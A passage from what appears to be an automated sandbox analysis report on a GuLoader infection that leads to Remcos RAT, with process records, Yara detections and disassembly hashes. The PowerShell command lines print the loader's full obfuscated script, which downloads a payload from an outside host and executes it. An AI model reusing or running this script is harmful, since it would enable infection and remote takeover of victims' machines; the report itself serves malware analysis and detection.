.cockCErhvo hronRav,v AdveDetor IsotFeed]Squa: His:Hos.FturtrKe.no ommCephBF elaSprnstodaeCadu6Sekh4StvkSV.cutScarrFr,tiPartn oligKrko( Sub$ CupYEs,an T,ddC,arl O,siM linKl ngMisasMegao .omfAbstfFej eS,ovr b g)');Nonprecipitation225 (Exposes 'Bskt$.risGEfteLSubpODaviBMedeAConil,ovi: kovT Ar.a KarlOwlgNNaziEBastTUdviTUfore MowNPlanEMeni Skil= Lac For[geomsAcroYSoljS nmetLu eE Be mKont. esttTilse ennXBobltL se.Konse SygnForfCLsbaoBde DGraiIVmmenC utGFico] la:Phot:TaleAPyrrS rocPaa IBundIUros. .ylgEmpuE Un tUn.ss CenTski rBesgII.den rosG Pee(Gn v$S lfEKhutKKnogsSupppKapioN.ncrFyldT VetV ad rPrisdJernI Teu)');Nonprecipitation225 (Exposes 'Dete$Ex agUnd LtimeoDr kbInglAundelFre,:SexiT NonrUdmaA T lMDiaePGl uAD smgSiddE Syn= Kvl$Mic.tGrasAReadLBootNCaboEBranTsanstStyreoplsnSillEMell.F.thSSulpu F,rbGermS nitTFjelRDistIVrign R kgMon (A sk$UlmorInapAsem,d,phaiMonoaPre TPe soUnexr Amuy ain,Outt$i juHAftauStilp BarpCa,raMundHCyclsTnde1B.dr7 Und6Hema)');Nonprecipitation225 $Trampage;"
                                          Imagebase:0x7ff741d30000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1384945897.0000029110071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:01:54:06
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:10
                                          Start time:01:54:16
                                          Start date:12/12/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uAe.enSta kHiggtSliseLoyktImmusBatz. hawHBargeBefra FandForlePlowr P dsBenp[,yds$MallEGra,r Cheh S evKulteSwelrTellv RemsKomps .ury AksgEnerd hino arkmArchmNaboeasshn ndle L n]Symb=Stra$ TilCSa bh rydeGatfm ewoIndgtBronhForbeT ddrSupea stapChesy');$Faerie=Exposes 'Hved$C emTGasavTaariCompsinqutBozaec nvpKarau DiknRe ik Jartteame Rr tSkots ps.TungDPantoFoulwCockn ilgl ParoA enaPit.dKretF I tiCop lstemeEl c(Gath$Ka.tRRabaiFlerdDravaOp pbM dllPar eP lmn At eOomisBattsR ot, fon$LsniEPro.xProjcangie K vpGirrtSinfoSquarFast)';$Exceptor=$Modenhedernes;Nonprecipitation225 (Exposes 'Cerb$I dkgMethlU drO nivBboucAK lvLUnna: LykSProjtUndeaintemSym,cRhodELipol vrtlMisyeMeddROrthnFleaendes=Inse(Rev tNoddE sims Allt Sai- acpAppla.ehjt Br.HC.st Sik$ApotesubrXEnkecToilEWarePTes TCabroDiodR Hes)');while (!$Stamcellerne) {Nonprecipitation225 (Exposes 'Semi$Re.sgHjvelA,tooJo.rbAutoaSu elEnkr:SigvSEmbekSlariPlanfD,bltLandeSweeb SpoeVarmh rapaSignnTestdBn.elBo,tiMystnPolygActis vlv=Slad$Non B Spir Notn InveIndihDrikaUn evAmieeLockpMucidbo kaSalmgGl.woToilgSucreBlocra ganSlokeTears') ;Nonprecipitation225 $Faerie;Nonprecipitation225 (Exposes ' rdeSDrueTBloca,jaeR ol.TT nn-AstrsUnchl ideeD spe SkrPU,gi Ud,o4');Nonprecipitation225 (Exposes ' Bra$ ntgRetslPl toNonpBEddiABes Lmi t:,mpoSTonetArguA Pa MPlascFiniES.aml FeslDeavEKommrPhotn riseFink=Ce.t(Ru.dT.verefylds tanTSkaa- CabpSt,ga uldTlaurH Inc Lys.$Mi.sEA tix N nCRserE verP artUndeOSammRUnr,)') ;Nonprecipitation225 (Exposes ' Cor$PalsgAddilProtoDankBvinyAKbstl R s:ProbJA phe riR KonnCropBlderATuesNRentEvisusT azTRdblAN.leTRokeIKretoKnobNToqu= Sa,$ Sa G Alml Kr.OBrygbSp,ca InaL Dis:reflDFerlI VrdP In,hSkoveOrign .nfH Ergy Ju dCol rLfteAT,lemConciFolkNUanse eps+ Ove+ Sal%a,pr$Ta.lnBrdbaP.arRNonccSkbnOE,nrSRaaki BlosStiv. TilCS inO,angu alln Fo T') ;$Ridableness=$Narcosis[$jernbanestation]}$Radiatory=326426;$Huppahs176=31719;Nonprecipitation225 (Exposes 'Toll$Kempg SublExc O .aabKorsAUdadl Tal:KonfyhebenFremDAutal SvmIVejoN AlrGHjemsKr mOUnd,fEvelfStaneFremr Spr ,amm=Seam L vegM nheronttTran-Obduc RelOAchiNK.dnTFlete lanGomatBedf Pea$ kuleUdstxEm ncEgene,utipWurztAlloOPedar');Nonprecipitation225 (Exposes '.lal$Caddg BonloveroBervbhal a ompl efj:Hy eE N,tkMisasPar.pSkoloamstrMeattStr vSyrurAdumd Sc,iOrph V.s=Va.e Gide[EnwhS Ud yStttsFir tProteVentmSis .cockCErhvo hronRav,v AdveDetor IsotFeed]Squa: His:Hos.FturtrKe.no ommCephBF elaSprnstodaeCadu6Sekh4StvkSV.cutScarrFr,tiPartn oligKrko( Sub$ CupYEs,an T,ddC,arl O,siM linKl ngMisasMegao .omfAbstfFej eS,ovr b g)');Nonprecipitation225 (Exposes 'Bskt$.risGEfteLSubpODaviBMedeAConil,ovi: kovT Ar.a KarlOwlgNNaziEBastTUdviTUfore MowNPlanEMeni Skil= Lac For[geomsAcroYSoljS nmetLu eE Be mKont. esttTilse ennXBobltL se.Konse SygnForfCLsbaoBde DGraiIVmmenC utGFico] la:Phot:TaleAPyrrS rocPaa IBundIUros. .ylgEmpuE Un tUn.ss CenTski rBesgII.den rosG Pee(Gn v$S lfEKhutKKnogsSupppKapioN.ncrFyldT VetV ad rPrisdJernI Teu)');Nonprecipitation225 (Exposes 'Dete$Ex agUnd LtimeoDr kbInglAundelFre,:SexiT NonrUdmaA T lMDiaePGl uAD smgSiddE Syn= Kvl$Mic.tGrasAReadLBootNCaboEBranTsanstStyreoplsnSillEMell.F.thSSulpu F,rbGermS nitTFjelRDistIVrign R kgMon (A sk$UlmorInapAsem,d,phaiMonoaPre TPe soUnexr Amuy ain,Outt$i juHAftauStilp BarpCa,raMundHCyclsTnde1B.dr7 Und6Hema)');Nonprecipitation225 $Trampage;"
                                          Imagebase:0x850000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.1610779678.0000000008EC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.1612779996.000000000971E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.1593326524.000000000616F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:01:54:16
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:13
                                          Start time:03:48:33
                                          Start date:12/12/2024
                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                          Imagebase:0x230000
                                          File size:59'904 bytes
                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Executed Functions

                                            Function 00007FFAAC5587A5 Relevance: 2.8, Strings: 1, Instructions: 1545COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6
                                            • API String ID: 0-1452363761
                                            • Opcode ID: 4b77e4a67f9ec26dad15368b1aba32ca94524bb1632b28f59b7011a043d14cd5
                                            • Instruction ID: 4a95abb24ed0e6b3863cf4e70fba20bb9bf883d07b3496e9e438f731513efe6f
                                            • Opcode Fuzzy Hash: 4b77e4a67f9ec26dad15368b1aba32ca94524bb1632b28f59b7011a043d14cd5
                                            • Instruction Fuzzy Hash: B9A22861A4EB8A8FF79A972888555747BE5EF56210F0841FEE08DC71D3DD1AAC0AC3C1
                                            Function 00007FFAAC559CCA Relevance: 1.8, Strings: 1, Instructions: 544COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6
                                            • API String ID: 0-1452363761
                                            • Opcode ID: 8af416150009c2b5f85dbb6ac391b316e86dda97a2d57a93d1062c84265e2dc3
                                            • Instruction ID: 90509307244c86e30a80f39f1ba252dfbc99673031c45a9a881c85962e1f347e
                                            • Opcode Fuzzy Hash: 8af416150009c2b5f85dbb6ac391b316e86dda97a2d57a93d1062c84265e2dc3
                                            • Instruction Fuzzy Hash: 5B02156294EBCA4FF356976888656657FE1EF57210F0840FEE08DC7193D91A9C4AC382
                                            Function 00007FFAAC55A4DA Relevance: 1.8, Strings: 1, Instructions: 543COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6
                                            • API String ID: 0-1452363761
                                            • Opcode ID: 47665115fb6d254476cf1606c578c05b33afac8306056fc7faa2d4230ceb1839
                                            • Instruction ID: de06d04f165b80c65f78ec54a0e211f5b831f52755089836bc4a542832bda0db
                                            • Opcode Fuzzy Hash: 47665115fb6d254476cf1606c578c05b33afac8306056fc7faa2d4230ceb1839
                                            • Instruction Fuzzy Hash: 2A02116294EBCA4FF756972888556747FE1EF97210F0880FEE08DCB193D919DC4A8392
                                            Function 00007FFAAC48AB26 Relevance: .5, Instructions: 471COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1397601725.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac480000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93f0ece615aed8a5ad3e12c85a6ff7edb958cd3cac400632bd9563f2caaddef1
                                            • Instruction ID: a6219a9e409f53c4b6af0b291471a9c3ca143a8f60a3a082ed74ac8ae8aa5e99
                                            • Opcode Fuzzy Hash: 93f0ece615aed8a5ad3e12c85a6ff7edb958cd3cac400632bd9563f2caaddef1
                                            • Instruction Fuzzy Hash: F4F1A130908A4E8FEBA8DF28C859BF977D1FF55310F04826EE85EC7291DB7499458B81
                                            Function 00007FFAAC48B8D2 Relevance: .5, Instructions: 457COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1397601725.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac480000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6a6bd9a5fc0ad9457c5e8a8a33629f8efea3b3f79710db4f24827e1000768be2
                                            • Instruction ID: d7f20a49cfc6281fd596d7041aa28e09033db741b78099434eda48746acabb0e
                                            • Opcode Fuzzy Hash: 6a6bd9a5fc0ad9457c5e8a8a33629f8efea3b3f79710db4f24827e1000768be2
                                            • Instruction Fuzzy Hash: 00E1C130908A4E8FEBA8DF28C8597F977D1FB55310F04826AD85DC7691CA78D9448B81
                                            Function 00007FFAAC48CF75 Relevance: 1.9, Strings: 1, Instructions: 684COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1397601725.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac480000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6
                                            • API String ID: 0-1452363761
                                            • Opcode ID: 30f44ec09a6a7f673b367d3c7256f9f141db0250d2521f9b50cc5925584f9a66
                                            • Instruction ID: 90d75657f982115fa9b6906446db3515a39554fab0beff0535bbcbb0863719d6
                                            • Opcode Fuzzy Hash: 30f44ec09a6a7f673b367d3c7256f9f141db0250d2521f9b50cc5925584f9a66
                                            • Instruction Fuzzy Hash: 0C329330A19A4A8FEF88DF58C495EB9BBE1FF59314F104169D00ED7296CA35E885CBC1
                                            Function 00007FFAAC55525D Relevance: 1.6, Strings: 1, Instructions: 358COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ?_H
                                            • API String ID: 0-1095511010
                                            • Opcode ID: d89ffaadc585f5c8cfab6dbe031d4da3ec1083be8d6bd06abf1d52019558cc26
                                            • Instruction ID: 5139833f3340be4e70f557c326be1bae6383771298eb5fe6ed21d1ad5dbcd205
                                            • Opcode Fuzzy Hash: d89ffaadc585f5c8cfab6dbe031d4da3ec1083be8d6bd06abf1d52019558cc26
                                            • Instruction Fuzzy Hash: 2BB1446294EB8E8FFB96DB6888555B57BD4EF52210B8840BEE04DC71D3D90AEC0983D1
                                            Function 00007FFAAC55121F Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8h
                                            • API String ID: 0-2550175997
                                            • Opcode ID: 13f202ceef384f81b5d1dd3f4668effc0f9f1cfe4207e2bb0d7c74cfcf7b92a6
                                            • Instruction ID: 264b17010d5da29e9140a8513caae8c2b27ff7168018d6b628479ace8b3f676d
                                            • Opcode Fuzzy Hash: 13f202ceef384f81b5d1dd3f4668effc0f9f1cfe4207e2bb0d7c74cfcf7b92a6
                                            • Instruction Fuzzy Hash: 6721B2A2D4F7C68FF3959768085A0792FE59F67650B0984BEE08ECB0D3D8199C0D8792
                                            Function 00007FFAAC559854 Relevance: .4, Instructions: 448COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6b578e82c6b7147883b3fa518b75cba8900d5998953a141553406ace8f01874e
                                            • Instruction ID: 22d5cc6cc5f93bb466f5300cd16db630836e2f29891d3156ffe8a72f4ebf8aa6
                                            • Opcode Fuzzy Hash: 6b578e82c6b7147883b3fa518b75cba8900d5998953a141553406ace8f01874e
                                            • Instruction Fuzzy Hash: C2D14662A4EB8A8FF756976888555B47BE1EF96210B0840FEE04DCB193D91EDC0AC3D1
                                            Function 00007FFAAC5590F9 Relevance: .4, Instructions: 422COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8899a568b13940fe7003ce3c634b94b3ec522a67447da2a61d3b0355c4248070
                                            • Instruction ID: d8de6d31dc083f6c7e6c93301dd387f0c32de58c74d4b13d905e8ee9370c4e56
                                            • Opcode Fuzzy Hash: 8899a568b13940fe7003ce3c634b94b3ec522a67447da2a61d3b0355c4248070
                                            • Instruction Fuzzy Hash: 92D1196294EB8A8FF795D72888556747BD1EF56210F1840BEE08DC71D3DE1EAC4A8382
                                            Function 00007FFAAC5541C9 Relevance: .4, Instructions: 368COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 40512a4e93118e1a5609f00db8b12854c233dfaea99cf6a33ef64287400fea6e
                                            • Instruction ID: 0da46025a68e64417ef073a00eebc8fbbe3c4b0e77b2738b1ebdca10bc5fec5e
                                            • Opcode Fuzzy Hash: 40512a4e93118e1a5609f00db8b12854c233dfaea99cf6a33ef64287400fea6e
                                            • Instruction Fuzzy Hash: 13A1276299EB8B8FF759976858165753BD5EF92210F4941BEE04EC30E3DE09E80983C1
                                            Function 00007FFAAC48B4E6 Relevance: .3, Instructions: 330COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1397601725.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac480000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a79337933cf3469d168ed3954a2b7693761dc30de50d73667795660ab483d7af
                                            • Instruction ID: 24e0ecacd0ad4fd1b0c566a500f18df54b2d375b38b73608c2462a7a3e8f54a0
                                            • Opcode Fuzzy Hash: a79337933cf3469d168ed3954a2b7693761dc30de50d73667795660ab483d7af
                                            • Instruction Fuzzy Hash: F9B1B37090CA4D8FEBA8DF28C8557F93BD1FF55310F04826EE85DC7292CA34A9458B86
                                            Function 00007FFAAC558B71 Relevance: .3, Instructions: 311COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be4990cac3fa571e5e749fde2eff8fca83d2fc9b55bcc0cda67497bb28f7704a
                                            • Instruction ID: 469faf2fcf52d251df88964609f4d1439cb2e163d051fc2456b8988669e448a4
                                            • Opcode Fuzzy Hash: be4990cac3fa571e5e749fde2eff8fca83d2fc9b55bcc0cda67497bb28f7704a
                                            • Instruction Fuzzy Hash: 2491056198EB8A8FF79A972888555747FE9EF53210F0841FEE08DCB193D91ADC0983D1
                                            Function 00007FFAAC55A26A Relevance: .2, Instructions: 219COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5f69fbbeac24f3680f8dc06da5770dafc69ab3185b451daf81392f930655f485
                                            • Instruction ID: ef791b3f1c8361f474b3cb2f6f9e3490794bb2d0bb46af72832ad8f8ffbc3207
                                            • Opcode Fuzzy Hash: 5f69fbbeac24f3680f8dc06da5770dafc69ab3185b451daf81392f930655f485
                                            • Instruction Fuzzy Hash: 0A613561A4E7CA8FEB529B6888555B57FE4EF57210B0941EFE04DCB0A3DA09D809C392
                                            Function 00007FFAAC558F58 Relevance: .1, Instructions: 126COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03a9b62a9666de807de7d781a46d52ba6bdac2c062ec78f16ea7e6da6f3ad2a6
                                            • Instruction ID: 02fb80b574b3f4e2babd1096864bfafe04827ee97ca69434545d77232a39b1cf
                                            • Opcode Fuzzy Hash: 03a9b62a9666de807de7d781a46d52ba6bdac2c062ec78f16ea7e6da6f3ad2a6
                                            • Instruction Fuzzy Hash: DF41D25198FBCA4FE766D76848A45747FE1DF17210B0844EEE08DCB1E3D90E9C0A8392
                                            Function 00007FFAAC555382 Relevance: .1, Instructions: 114COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 28a7b2b1b1c0d27c99a59fd32839f9d26eec768bc5092b2f1c2240f0fb25d633
                                            • Instruction ID: 44e2c451da39c7dcd0e183895e805efb265a1dd61bef54b4d8c6c185bb62f098
                                            • Opcode Fuzzy Hash: 28a7b2b1b1c0d27c99a59fd32839f9d26eec768bc5092b2f1c2240f0fb25d633
                                            • Instruction Fuzzy Hash: 4E315952D5FA8F8FFBA59B6858161786AC4EF02251B9941BEF44EC70D3DD0BAC0883C1
                                            Function 00007FFAAC5589E7 Relevance: .1, Instructions: 105COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9666d93c62f6484476459f913457c05bfd61d0946cb73fbd30150aaef98a2502
                                            • Instruction ID: 7913a1681dc34ba953844fab140035fae74d7bef1ad87b099c987446873d185e
                                            • Opcode Fuzzy Hash: 9666d93c62f6484476459f913457c05bfd61d0946cb73fbd30150aaef98a2502
                                            • Instruction Fuzzy Hash: 4E21E726B8DB0E8DF669922CF8021F977C4DBC6131F14527AE44FC3592DE16E84A82C1
                                            Function 00007FFAAC554354 Relevance: .1, Instructions: 100COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1399124491.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac550000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0de28f53119bedf43cecf853411e1ec997dc51fca56fa753132262c6ab872200
